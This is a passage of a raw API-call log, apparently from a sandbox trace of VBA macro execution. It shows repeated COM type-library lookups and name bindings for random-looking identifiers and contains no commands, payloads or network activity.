returned 0x4 [0068.871] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0068.871] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0068.871] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0068.872] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0068.872] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0068.872] IUnknown:Release (This=0x665ba50) returned 0xd [0068.872] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0068.872] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0068.872] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0068.872] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0068.872] IUnknown:AddRef (This=0xaf0b6e0) returned 0x5 [0068.872] IUnknown:Release (This=0xaf0b6e0) returned 0x4 [0068.872] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0068.872] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0068.872] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0068.872] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0068.872] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0068.872] IUnknown:Release (This=0x665ba50) returned 0xd [0068.872] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0068.872] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0068.872] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0068.872] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0068.872] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61272, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="t1DAAx") returned 7 [0068.872] ITypeComp:RemoteBind (in: This=0x665ba60, szName="t1DAAx", lHashVal=0x10380c, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.873] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61272, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="t1DAAx") returned 7 [0068.873] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="t1DAAx", lHashVal=0x10380c, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.873] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61272, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="t1DAAx") returned 7 [0068.873] ITypeComp:RemoteBind (in: This=0x665bd30, szName="t1DAAx", lHashVal=0x10380c, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.873] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="t1DAAx") returned 0x10380c [0068.873] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="t1DAAx" | out: _Dst="t1DAAx") returned 0x0 [0068.873] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="t1DAAx") returned 7 [0068.873] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.873] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="t1DAAx", lHashVal=0x10380c, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.873] IUnknown:Release (This=0x665ba50) returned 0xd [0068.873] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.873] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="t1DAAx", lHashVal=0x10380c, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.873] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.873] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.873] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="t1DAAx", lHashVal=0x10380c, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.873] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.873] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.873] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="t1DAAx", lHashVal=0x10380c, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.873] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.874] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61272, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="t1DAAx") returned 7 [0068.874] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="t1DAAx", lHashVal=0x10380c, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.874] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0068.874] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3a61272 | out: _Dst=0x67c2d40) returned 0x0 [0068.874] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_t1DAAx") returned 0x10b2b5 [0068.874] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_t1DAAx" | out: _Dst="_B_var_t1DAAx") returned 0x0 [0068.874] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_t1DAAx") returned 14 [0068.874] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.874] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_t1DAAx", lHashVal=0x10b2b5, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.874] IUnknown:Release (This=0x665ba50) returned 0xd [0068.874] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.874] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_t1DAAx", lHashVal=0x10b2b5, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.874] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.874] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.874] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_t1DAAx", lHashVal=0x10b2b5, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.874] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.874] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.874] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_t1DAAx", lHashVal=0x10b2b5, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.874] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.874] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.874] IUnknown:Release (This=0x665ba50) returned 0xd [0068.874] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cc2d4a, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_t1DAAx") returned 14 [0068.874] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_t1DAAx", lHashVal=0x10b2b5, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x74005f00720061, ppTypeComp=0x41004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x74005f00720061, ppTypeComp=0x41004100000000, pDummy=0x0) returned 0x0 [0068.875] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3a61272 | out: _Dst=0x144ec0) returned 0x0 [0068.875] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a6136e, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="lAXAXX") returned 7 [0068.875] ITypeComp:RemoteBind (in: This=0x665ba60, szName="lAXAXX", lHashVal=0x1015db, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.875] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a6136e, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="lAXAXX") returned 7 [0068.875] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="lAXAXX", lHashVal=0x1015db, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.875] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a6136e, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="lAXAXX") returned 7 [0068.875] ITypeComp:RemoteBind (in: This=0x665bd30, szName="lAXAXX", lHashVal=0x1015db, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.875] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="lAXAXX") returned 0x1015db [0068.875] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="lAXAXX" | out: _Dst="lAXAXX") returned 0x0 [0068.875] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="lAXAXX") returned 7 [0068.875] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.875] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="lAXAXX", lHashVal=0x1015db, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.875] IUnknown:Release (This=0x665ba50) returned 0xd [0068.875] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.875] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="lAXAXX", lHashVal=0x1015db, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.875] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.875] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.876] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="lAXAXX", lHashVal=0x1015db, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.876] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.876] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.876] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="lAXAXX", lHashVal=0x1015db, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.876] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.876] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a6136e, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="lAXAXX") returned 7 [0068.876] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="lAXAXX", lHashVal=0x1015db, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.876] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0068.876] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3a6136e | out: _Dst=0x67c2d40) returned 0x0 [0068.876] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_lAXAXX") returned 0x109084 [0068.876] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_lAXAXX" | out: _Dst="_B_var_lAXAXX") returned 0x0 [0068.876] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_lAXAXX") returned 14 [0068.876] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.876] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_lAXAXX", lHashVal=0x109084, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.876] IUnknown:Release (This=0x665ba50) returned 0xd [0068.876] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.876] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_lAXAXX", lHashVal=0x109084, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.876] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.876] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.876] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_lAXAXX", lHashVal=0x109084, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.876] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.876] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.877] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_lAXAXX", lHashVal=0x109084, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.877] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.877] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.877] IUnknown:Release (This=0x665ba50) returned 0xd [0068.877] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cc2d7a, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_lAXAXX") returned 14 [0068.877] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_lAXAXX", lHashVal=0x109084, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x6c005f00720061, ppTypeComp=0x58004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x6c005f00720061, ppTypeComp=0x58004100000000, pDummy=0x0) returned 0x0 [0068.877] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3a6136e | out: _Dst=0x144ec0) returned 0x0 [0068.877] ITypeComp:RemoteBind (in: This=0x665ba60, szName="jABGCBZ", lHashVal=0x10f8d7, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.877] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61346, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="jABGCBZ") returned 8 [0068.877] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="jABGCBZ", lHashVal=0x10f8d7, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.877] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61346, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="jABGCBZ") returned 8 [0068.877] ITypeComp:RemoteBind (in: This=0x665bd30, szName="jABGCBZ", lHashVal=0x10f8d7, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.877] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="jABGCBZ") returned 0x10f8d7 [0068.877] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="jABGCBZ" | out: _Dst="jABGCBZ") returned 0x0 [0068.877] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="jABGCBZ") returned 8 [0068.877] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.877] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="jABGCBZ", lHashVal=0x10f8d7, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.877] IUnknown:Release (This=0x665ba50) returned 0xd [0068.878] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.878] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="jABGCBZ", lHashVal=0x10f8d7, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.878] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.878] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.878] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="jABGCBZ", lHashVal=0x10f8d7, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.878] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.878] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.878] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="jABGCBZ", lHashVal=0x10f8d7, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.878] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.878] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61346, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="jABGCBZ") returned 8 [0068.878] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="jABGCBZ", lHashVal=0x10f8d7, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.878] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0068.878] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3a61346 | out: _Dst=0x67c2d40) returned 0x0 [0068.878] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_jABGCBZ") returned 0x10fc5b [0068.878] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_jABGCBZ" | out: _Dst="_B_var_jABGCBZ") returned 0x0 [0068.878] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_jABGCBZ") returned 15 [0068.878] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.878] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_jABGCBZ", lHashVal=0x10fc5b, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.879] IUnknown:Release (This=0x665ba50) returned 0xd [0068.879] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.879] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_jABGCBZ", lHashVal=0x10fc5b, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.879] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.879] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.879] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_jABGCBZ", lHashVal=0x10fc5b, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.879] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.879] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.879] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_jABGCBZ", lHashVal=0x10fc5b, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.879] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.879] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.879] IUnknown:Release (This=0x665ba50) returned 0xd [0068.879] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cc2daa, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_jABGCBZ") returned 15 [0068.879] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_jABGCBZ", lHashVal=0x10fc5b, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x6a005f00720061, ppTypeComp=0x43004700000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x6a005f00720061, ppTypeComp=0x43004700000000, pDummy=0x0) returned 0x0 [0068.879] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3a61346 | out: _Dst=0x144ec0) returned 0x0 [0068.879] ITypeComp:RemoteBind (in: This=0x665ba60, szName="MUBGAAD4", lHashVal=0x10dbe6, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, 